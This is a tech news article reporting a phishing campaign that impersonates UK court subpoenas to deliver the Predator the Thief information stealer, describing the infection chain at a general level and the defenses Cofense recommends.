Fake court summons used to spread phishing malware

News
By published

Unsuspecting users think they've been subpoenaed when really their system has been infected with malware

(Image credit: Shutterstock)

The cybersecurity firm Cofense has discovered a new phishing campaign which targets users via a subpoena-themed email that appears to come from the UK Ministry of Justice with the end goal of infecting their systems with information-stealing malware.

Employees at insurance and retail companies have received these phishing emails that state that the recipient has been subpoenaed and needs to click on a link within the email to see more details about their case.

The enclosed link uses trusted sources including Google Docs and Microsoft OneDrive for the infection chain. While the Google Docs link is not malicious, it does contain a redirect chain that eventually leads to a malicious Microsoft Word file filled with macros. Once executed, the macro downloads a sample of the Predator the Thief information stealer malware via PowerShell.

The initial email also contains a warning that the recipient has 14 days to comply with the subpoena notice which is a scare tactic designed to trick users into clicking on the link inside the email.

Predator the Thief

Predator the Thief has all the basic capabilities of most information stealers. However, one of the unique things about this malware is the wide range of web browsers it targets which means even those using a less popular web browser could still be affected.

The authors of the malware use a Telegram channel to distribute their product but it also functions as a customer support channel.

Predator the Thief targets cryptocurrency wallets, browser information, FTP and email credentials. The malware also takes a screenshot of the infected machine and this information is send back to a Command and Control (C2) server via an HTTP POST.

After the information on the target is gathered and the sample has been sent to the C2, the binary then cleans up parts of the infection and self-terminates. This makes it much harder for the malware to be discovered.

To avoid falling victim to this latest phishing campaign, Cofense recommends disabling Microsoft macros by default and employing endpoint protection.

TOPICS
Anthony Spadafora
Anthony Spadafora

After working with the TechRadar Pro team for the last several years, Anthony is now the security and networking editor at Tom’s Guide where he covers everything from data breaches and ransomware gangs to the best way to cover your whole home or business with Wi-Fi. When not writing, you can find him tinkering with PCs and game consoles, managing cables and upgrading his smart home. 

Latest in Security
ransomware avast
One of the most powerful ransomware hacks around has been cracked using some serious GPU power
person at a computer
Many workers are overconfident at spotting phishing attacks
A fish hook is lying across a computer keyboard, representing a phishing attack on a computer system
Microsoft 365 accounts are under attack from new malware spoofing popular work apps
Data Breach
Thousands of healthcare records exposed online, including private patient information
China
Juniper patches security flaws which could have let hackers take over your router
Representational image depecting cybersecurity protection
GitLab has patched a host of worrying security issues
Latest in News
European Union technical background
EU tech companies push for digital sovereignty, reducing reliance on US and others
ransomware avast
One of the most powerful ransomware hacks around has been cracked using some serious GPU power
Star Wars Knights of the Old Republic
Knights of the Old Republic remake developer Saber Interactive states all its projects are 'still in development'
google nest
Google is slowly phasing out its Assistant helper to make room for Gemini's reign in smartphones - here’s how it’s doing the same for smart home devices
Renault 5 Turbo 3E
Renault unveils its wildest EV to date and it comes with in-wheel motors and a rally-style vertical handbrake for drifting
Circular smart ring
Circular's new smart ring is getting blood pressure and blood glucose monitoring before the Apple Watch
More about security
ransomware avast

One of the most powerful ransomware hacks around has been cracked using some serious GPU power
A fish hook is lying across a computer keyboard, representing a phishing attack on a computer system

Microsoft 365 accounts are under attack from new malware spoofing popular work apps
Sakata in Demon City holds a large cleaver-like weapon

Demon City on Netflix is Japan's answer to John Wick with a dash of Oldboy, and it rocks
See more latest
Most Popular
ransomware avast
One of the most powerful ransomware hacks around has been cracked using some serious GPU power
A fish hook is lying across a computer keyboard, representing a phishing attack on a computer system
Microsoft 365 accounts are under attack from new malware spoofing popular work apps
Snap Spectacles 5
Latest Snap Spectacles update teases an exciting AR future that I can't wait for
Renault 5 Turbo 3E
Renault unveils its wildest EV to date and it comes with in-wheel motors and a rally-style vertical handbrake for drifting
3D version of the Adobe logo
Adobe Summit 2025 - all the news and updates as it happens
google nest
Google is slowly phasing out its Assistant helper to make room for Gemini's reign in smartphones - here’s how it’s doing the same for smart home devices
European Union technical background
EU tech companies push for digital sovereignty, reducing reliance on US and others
Gemini on a mobile phone.
Worryingly, Google Gemini’s new AI image generation features can be used to remove watermarks from images and I'm concerned
Star Wars Knights of the Old Republic
Knights of the Old Republic remake developer Saber Interactive states all its projects are 'still in development'
Percy walks into a forest camp in Percy Jackson and the Olympians' Disney Plus series
Disney+ renews Percy Jackson and the Olympians for season 3, unleashing an epic new odyssey based on the The Titan's Curse